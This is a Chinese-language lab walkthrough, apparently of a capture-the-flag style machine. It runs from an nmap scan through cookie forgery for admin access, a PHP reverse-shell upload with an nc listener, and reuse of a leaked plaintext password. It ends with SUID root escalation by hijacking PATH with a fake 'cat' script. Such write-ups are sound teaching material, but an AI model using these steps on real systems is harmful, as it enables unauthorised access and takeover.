大概流程:
端口扫描 --> js接口提取 --> 垂直越权 --> 文件上传GetShell --> SUID提权
1、端口扫描
nmap --top-ports 100 10.129.29.193
2、js接口提取
查看网络源代码,发现登录接口/cdn-cgi/login
3、cookie伪造
将role改为admin,且url上的id改为1,得到admin的Access ID,接着将得到的Access ID替换原来的user的value值,实现垂直越权
4、文件上传Getshell
上传一个反弹shell的木马php文件,ip地址改成自己的vpn地址,端口改成9999
攻击者:
nc -lvnp 9999
curl http://10.129.29.193/uploads/reverse.php //向目标服务器发送HTTPB GET请求
CURL:是一个命令行工具和库,用于使用各种网络协议传输数据
5、横向移动
在/var/www/html/cdn-cgi/login/目录下发现robert的密码M3g4C0rpUs3r!,尝试切换用户
切换交互式shell(以下任意一条命令):
SHELL=/bin/bash script -q /dev/null
python3 -c 'import pty;pty.spawn("/bin/bash")'
非交互式shell:将目标机的命令输入/输出通过网络管道重定向到攻击机,没有伪终端,很多操作命令无法实现
交互式shell:有伪终端,支持有关操作命令,如su/sudo
查看当前用户和所属组的身份信息:id
发现robert用户归属于bugtracker用户组
查看当前用户和所属组的身份信息:id
发现robert用户归属于bugtracker用户组
示例:
$ id
uid=1000(alice) gid=1000(alice) groups=1000(alice),4(adm),24(cdrom)
uid (User ID):用户ID号及用户名
id (Group ID):主组ID号及组名
groups:用户所属的所有组
接着输入以下命令:
find / -type f -group bugtracker 2>/dev/null //-type f 为查找普通文档,-group bugtracker限定查找的组为bugtracker,2>/dev/null将错误输出到黑洞(不显示)
ls -al /usr/bin/bugtracker //-al 以长格式方式显示并且显示隐藏文件
6、SUID提权
当一个文件被设置了SUID位时,任何执行该文件的用户都将以文件所有者的权限执行程序,而不是以执行者的权限执行
文件所有者权限指的是文件或目录的创建者(拥有者)对该文件所具有的操作权限
查看二进制文件中的字符串
strings /usr/bin/bugtracker
从运行结果来看,bugtracker调用了cat,且为绝对路径
利用PATH环境变量劫持cat
export PATH=/tmp:$PATH //修改PATH环境变量,将/tmp目录置于最前
cd /tmp/ //切换到/tmp目录下
echo '/bin/sh' > cat //创建名为cat的文件,内容为/bin/sh,
创建了一个脚本,执行时会启动一个shell,由于bugtracker有root权限(通常通过setuid),所以获得root shell
chmod +x cat //赋予执行权限
bugtracker再次调用cat命令时实际上调用的是/tmp目录下的恶意的cat命令,
运行/usr/bin/bugtracker:此时robert用户临时具有了root权限,执行id命令发现只是robert用户的uid变为了root,不是真正的root用户
